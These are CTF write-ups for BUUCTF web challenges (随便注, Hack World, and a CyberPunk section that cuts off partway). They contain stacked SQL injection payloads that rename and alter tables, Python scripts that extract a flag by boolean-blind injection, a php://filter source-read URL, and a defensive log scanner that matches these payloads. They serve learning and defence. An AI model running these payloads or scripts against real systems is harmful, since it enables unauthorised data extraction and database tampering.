Challenge index reference: https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/
随便注
Challenge source: 强网杯 2019
Challenge link: https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8
Topics: stacked injection, SQL SHOW statements, SQL prepared statements, SQL table modification
References: https://www.cnblogs.com/chalan630/p/12583667.html, https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/
Test statement: 1' and '1'='1 gives the same response as the plain input 1.
1' # error
1'--+ # normal, evaluates True
1' and 1=1 --+ # normal, evaluates True
1' and 1=2 --+ # normal, evaluates False
?inject=1' order by 3--+ # error 1054 : Unknown column '3' in 'order clause'
?inject=1'; show tables; --+ # returns the tables 1919810931114514 and words
?inject=1'; show columns from words; --+
?inject=1'; show columns from `1919810931114514`;--+
words {
id int(10);
data varchar(20);
}
1919810931114514{
flag varchar(100);
}
payload1: modify the tables
?inject=1'; rename table `words` to `words1`; rename table `1919810931114514` to `words`; alter table `words` change `flag` `id` VARCHAR(100) character set utf8 collate utf8_general_ci not null;--+
payload2: prepared statement
1';Set @a=concat("sel","ect flag from `1919810931114514`");Prepare s from @a; execute s; --+
flag
flag{34745aea-2541-43e6-884f-c67988afc34a}
Normal SQL injection workflow
1 # normal input
1' # if this errors, the single quote is a possible injection point
1' --+ # determine the injection type
1' and 1=1 --+ # determine the injection type
1' and 1=2 --+ # determine the injection type
1' order by 3 --+ # determine the number of columns
SQL SHOW commands
show databases;
show tables;
show tables from db_name;
show engines;
show character set; # lists the supported character sets
show columns from tbl_name;
show create database db_name; # shows the statement that created an existing database
show create table tbl_name; # shows the statement that created an existing table
Stacked SQL injection
Adding a semicolon ; makes it possible to execute several SQL statements on one line.
SQL table modification
rename table `words` to `test`;
rename table `1919810931114514` to `words`;
alter table `words` change `flag` `id` varchar(100);
SQL prepared statements
SET @var_name = value; # sets a user variable name and value
PREPARE stmt_name FROM preparable_stmt; # prepares a statement and gives it a name so it can be referenced later
EXECUTE stmt_name; # executes the statement
{DEALLOCATE | DROP} PREPARE stmt_name; # releases the prepared statement
Example
set @sql=CONCAT('se','lect * from `1919810931114514`;');
prepare stmt from @sql;
execute stmt;
Hack World
Source: [CISCN2019 华北赛区 Day2 Web1]
Link: https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World
Reference: https://ca01h.top/Web_security/ctf_writeup/7.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5/#CISCN2019-Hack-world
Topics: boolean-based blind injection
The payload makes you want to swear.
Trying normal inputs: 1 and 2 work, anything beyond that does not.
Trying the usual injections: only a bare single quote returns bool(false), which should be the hint for boolean-based blind injection.
The payload is
if(ascii(substr((select(flag)from(flag)),1,1))=ascii('f'),1,2)
Since 1 and 2 produce different output, the injection can be driven by that difference.
A dictionary can be used to observe which characters the WAF filters.
Script
import requests

url = "http://a9e8a73f-f3d4-4ee4-a165-78c21730f40d.node3.buuoj.cn/index.php"
text1 = "Hello, glzjin wants a girlfriend."
text2 = "Do you want to be my girlfriend?"
ans = ""
for i in range(60):
    # print("debug")
    flag = False
    for j in range(0, 256):
        c = chr(j)
        # print(c)
        # compare by ASCII code here: SQL string comparison is case-insensitive, and comparing the character directly runs into quoting and case problems
        s = "if(ascii(substr((select(flag)from(flag)),{},1))={},1,2)".format(i + 1, j)
        post_data = {
            "id": s
        }
        # print(s)
        response = requests.post(url, post_data)
        if text1 in response.text:
            flag = True
            ans += c
            print(c)
            break
    if not flag:
        break
print(ans)
# if(substr(select(flag)from(flag),{},1)={},1,2)
This script is slow; there are two ways to speed it up. One is to search by ASCII code (this challenge filters ord, so only ascii can be used for the conversion), the other is to set the lower bound of range to 32 (printable characters start at 32).
The writeup provides a binary-search script
import requests
from time import sleep

url = 'http://a9475c38-821c-4b23-aa96-87730f0863fe.node3.buuoj.cn/index.php'
flag = 'Hello, glzjin wants a girlfriend.'
result = ''
for i in range(1, 50):
    sleep(1)
    high = 127
    low = 32
    mid = (high + low) // 2
    # binary search over the printable ASCII range for the i-th flag character
    while high > low:
        payload = "if(ascii(substr((select(flag)from(flag)),{index},1))>{char},1,2)".format(index=i, char=mid)
        data = {'id': payload}
        response = requests.post(url=url, data=data)
        if flag in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (high + low) // 2
    result += chr(mid)
    print(result)
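As an added defensive example (not from this writeup or the challenges), a small Python scanner that flags the three request patterns seen in 随便注 and Hack World above, stacked queries after a semicolon, the split-keyword concat() used with PREPARE, and the if(ascii(substr( boolean-blind probe, when run over web log lines; the log format, IPs and lines are constructed for the example.

```python
from __future__ import annotations
import re
from urllib.parse import unquote_plus

# Constructed sample log: "<ip> <method> <path?query or form body>" per line
SAMPLE_LOG = """\
10.0.0.5 GET /?inject=1
10.0.0.5 GET /?inject=1%27%3B+show+tables%3B+--%2B
10.0.0.5 GET /?inject=1%27%3B+rename+table+%60words%60+to+%60words1%60%3B--%2B
10.0.0.5 GET /?inject=1%27%3BSet+%40a%3Dconcat%28%22sel%22%2C%22ect+flag+from+%601919810931114514%60%22%29%3BPrepare+s+from+%40a%3B+execute+s%3B+--%2B
10.0.0.7 POST /index.php id=if(ascii(substr((select(flag)from(flag)),1,1))>79,1,2)
10.0.0.9 GET /?inject=O%27Reilly
"""

# Each rule targets one technique from the writeup; a benign apostrophe alone does not fire
RULES = {
    # a semicolon followed by a statement that has no place inside a single SELECT
    "stacked-query": re.compile(r";\s*(show|rename|alter|set|prepare|execute|drop)\b", re.I),
    # keyword split across two string literals to dodge a word blacklist, e.g. concat("sel","ect ...")
    "split-keyword": re.compile(r"concat\s*\(\s*['\"][a-z]+['\"]\s*,\s*['\"][a-z]+", re.I),
    # character-by-character boolean probe used by the blind scripts
    "boolean-blind": re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr\s*\(", re.I),
}


def scan_line(line: str) -> list[str]:
    """Return the names of the rules that match one URL-decoded log line."""
    try:
        _ip, _method, rest = line.split(" ", 2)
    except ValueError:
        return []
    decoded = unquote_plus(rest)  # decode before matching so %3B and + do not hide the pattern
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based line numbers to the rules they trigger; clean lines are omitted."""
    hits: dict[int, list[str]] = {}
    for number, line in enumerate(text.splitlines(), 1):
        names = scan_line(line)
        if names:
            hits[number] = names
    return hits


if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(names)}")
```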
CyberPunk
Source: [CISCN2019 华北赛区 Day1 Web5]
Link: https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day1%20Web5]CyberPunk
Topics: PHP pseudo-protocols (php:// wrappers), XPath error-based injection, load_file
Reference: https://www.cnblogs.com/wangtanzhi/p/12318551.html
Step 1
Open the page first; the index page accepts a file parameter via GET, so the php:// filter wrapper can be used to read the source directly.
http://xxx.xxx/index.php?file=php://filter/convert.base64-encode/resource=index.php
Step 2
<?php //index.php
ini_set('open_basedir', '/var/www/html/');
// $file = $_GET["file"];
$file = (isset($_GET['file']) ? $_GET['file'] : null);
if (isset($file)){
    if (preg_match("/phar|zip|bzip2|zlib|data|input|%00/i",$file)) {
        echo('no way!');
        exit;
    }
    @include($file);
}
?>
<!--?file=?-->
<?php //change.php
require_once "config.php";
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}'